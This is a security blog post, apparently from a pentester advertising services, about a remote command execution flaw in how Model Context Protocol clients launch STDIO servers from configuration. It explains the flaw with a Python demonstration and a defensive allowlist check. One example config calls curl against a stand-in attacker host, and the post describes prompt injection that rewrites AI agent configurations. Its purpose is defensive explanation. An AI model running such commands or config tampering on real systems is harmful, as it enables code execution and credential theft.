MCP Vulnerability: Remote Command Execution in Anthropic’s AI Protocol
A design flaw in Anthropic’s Model Context Protocol (MCP) allows attackers to run arbitrary commands on systems running vulnerable MCP implementations.
150 million+ downloads affected. 7,000+ public servers and packages. 10+ CVEs across the ecosystem.
If you’re using MCP-based tools (LangChain, Flowise, Cursor, Windsurf, or any of the 7,000+ affected services), attackers could potentially access your data, API keys, databases, and chat histories. Remotely.
What Is the Vulnerability?
Researchers at OX Security discovered that unsafe defaults in how MCP implementations handle STDIO (standard input/output) configuration enable arbitrary command execution, a form of remote code execution (RCE).
In plain English: an attacker who can send a command to an MCP server can execute code on the machine running it. The issue exists across all language implementations: Python, TypeScript, Java, and Rust.
The vulnerability falls into four categories:
- Unauthenticated command injection via MCP STDIO
- Direct STDIO configuration with hardening bypass
- Zero-click prompt injection editing MCP configuration
- Hidden STDIO configurations triggered via network requests
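To make the core pattern concrete, here is a minimal sketch of why attacker-influenced STDIO configuration equals code execution. This is illustrative only, not the actual MCP SDK: the config shape mimics a typical `mcpServers` JSON block, and `launch_stdio_server` is a hypothetical name standing in for any client that spawns whatever command the config names.

```python
import subprocess
import sys

# Hypothetical illustration (not the real MCP SDK). MCP clients launch
# STDIO servers by executing a "command" taken straight from a config
# file. If an attacker can write or edit that config (e.g. via prompt
# injection), they choose what gets executed.
untrusted_config = {
    "mcpServers": {
        "files": {
            # Attacker swapped the legitimate server binary for a payload.
            # sys.executable stands in for any binary the attacker names.
            "command": sys.executable,
            "args": ["-c", "print('attacker code runs here')"],
        }
    }
}

def launch_stdio_server(server_cfg):
    # The dangerous pattern: spawn whatever the config names, with no
    # allowlist, signature check, or user confirmation.
    return subprocess.run(
        [server_cfg["command"], *server_cfg["args"]],
        capture_output=True,
        text=True,
    )

result = launch_stdio_server(untrusted_config["mcpServers"]["files"])
print(result.stdout.strip())
```

The payload here is a harmless `print`, but it could just as easily read `~/.aws/credentials` or open a reverse shell; the launcher has no way to tell the difference.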
Affected Projects (Partial List)
Notable CVEs include MCP Inspector (CVE-2025-49596), LibreChat (CVE-2026-22252), WeKnora (CVE-2026-22688), and Cursor (CVE-2025-54136).
Anthropic’s Response
Anthropic has declined to modify the protocol’s architecture, citing the behavior as “expected.”
Let me translate that for you: “We designed it this way. It’s working as intended. The risk is now your problem.”
OX Security put it perfectly: “Shifting responsibility to implementers does not transfer the risk. It just obscures who created it.”
What This Means for Your AI Agent
If your AI agent uses MCP, directly or through a framework like LangChain or Flowise, here’s what’s at risk:
- 🔴 Remote code execution on your server
- 🔴 Exposed API keys and credentials
- 🔴 Database access and data exfiltration
- 🔴 Chat history leakage
- 🔴 Lateral movement to internal systems
What You Should Do Right Now
- Block public IP access to any MCP services
- Run MCP-enabled services in a sandbox/container, no exceptions
- Monitor MCP tool invocations for anomalies
- Treat external MCP configuration input as untrusted
- Only install MCP servers from verified sources
- Patch affected tools immediately (LiteLLM, Bisheng, DocsGPT have patches available)
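The “treat external MCP configuration input as untrusted” step can be sketched as a fail-closed allowlist check before anything is launched. The helper name `validate_server_config` and the paths in `ALLOWED_COMMANDS` are assumptions for illustration, not part of any MCP SDK:

```python
import shutil

# Only absolute paths to binaries you installed and audited yourself.
ALLOWED_COMMANDS = {
    "/usr/local/bin/mcp-server-filesystem",
    "/usr/local/bin/mcp-server-git",
}

def validate_server_config(server_cfg: dict) -> str:
    """Resolve the configured command and refuse anything off-allowlist."""
    command = server_cfg.get("command", "")
    resolved = shutil.which(command) or command
    if resolved not in ALLOWED_COMMANDS:
        # Fail closed: an edited config (e.g. via zero-click prompt
        # injection) never reaches subprocess execution.
        raise PermissionError(f"MCP command not allowlisted: {command!r}")
    return resolved

# A tampered config is rejected before anything runs:
try:
    validate_server_config({"command": "curl", "args": ["http://evil.example/x"]})
except PermissionError as err:
    print(err)
```

The key design choice is comparing the *resolved* path against an explicit set, rather than blocklisting “bad” commands: a blocklist can always be bypassed with an alternate binary, while an allowlist only runs what you put there.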
This is what a supply chain vulnerability looks like in the AI era.
Can a Pentest Find This?
Yes. This is exactly the kind of vulnerability I look for.
MCP command injection, STDIO configuration bypasses, prompt injection leading to RCE: these are testable attack surfaces. Automated scanners miss them. Human-led red teaming finds them.
If you’re running MCP anywhere in your stack, assume nothing. Test everything.
Worried about your AI agent’s security?
AI agent pentesting. Prompt injection. MCP vulnerabilities. RCE. Supply chain attacks.
I find what automated scanners miss.
📩 DM @StackOfTruths on X
Free 15-min consultation. No hard sell. Just honest answers about your AI agent security.